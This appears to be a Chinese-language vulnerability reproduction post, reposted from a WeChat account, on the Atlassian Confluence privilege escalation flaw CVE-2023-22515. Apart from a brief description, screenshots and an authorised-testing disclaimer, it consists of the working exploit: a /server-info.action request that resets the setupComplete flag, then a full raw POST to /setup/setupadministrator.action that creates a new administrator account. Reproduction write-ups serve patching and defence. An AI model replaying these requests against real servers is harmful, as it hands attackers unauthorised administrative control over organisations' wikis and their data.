Atlassian Confluence是Atlassian公司出品的专业wiki程序。它可以作为一个知识管理的工具,通过它能够实现团队成员之间的协作和知识共享。
![[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)](http://cn-sec.com/wp-content/uploads/2023/11/10-1699109850.png "[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)")
![[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)](http://cn-sec.com/wp-content/uploads/2023/11/7-1699109850.png "[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)")
攻击者可以利用有访问权限的Confluence Data Center and Server实例漏洞在未授权的情况下创建Confluence管理员用户并以管理员权限进入Confluence后台。
![[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)](http://cn-sec.com/wp-content/uploads/2023/11/3-1699109851.png "[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)")
![[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)](http://cn-sec.com/wp-content/uploads/2023/11/6-1699109852.png "[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)")
![[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)](http://cn-sec.com/wp-content/uploads/2023/11/2-1699109852.png "[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)")
![[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)](http://cn-sec.com/wp-content/uploads/2023/11/4-1699109853.png "[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)")
/server-info.action?BootstrapStatusProvider.applicationConfig.setupComplete=false![[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)](http://cn-sec.com/wp-content/uploads/2023/11/10-1699109853.png "[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)")
第二次发包创建账号
POST /setup/setupadministrator.action HTTP/1.1Host: 192.168.168.129:8090Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed- exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=B3FC576A89A343C219366798C6DA400FConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 95username=user&fullName=user&[email protected]&password=user&confirm=user&setup-next-button=Next
这是CVE-2023-22515不是CVE-2023-22518
注:本文中提到的漏洞验证 poc 或工具仅用于授权测试,任何未经授权的测试均属于非法行为。任何人不得利用本文中的技术手段或工具进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
![[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)](http://cn-sec.com/wp-content/uploads/2023/11/4-1699109853.gif "[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)")
原文始发于微信公众号(扫地僧的茶饭日常):[漏洞复现] Atlassian Confluence权限提升漏洞(CVE-2023-22515)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论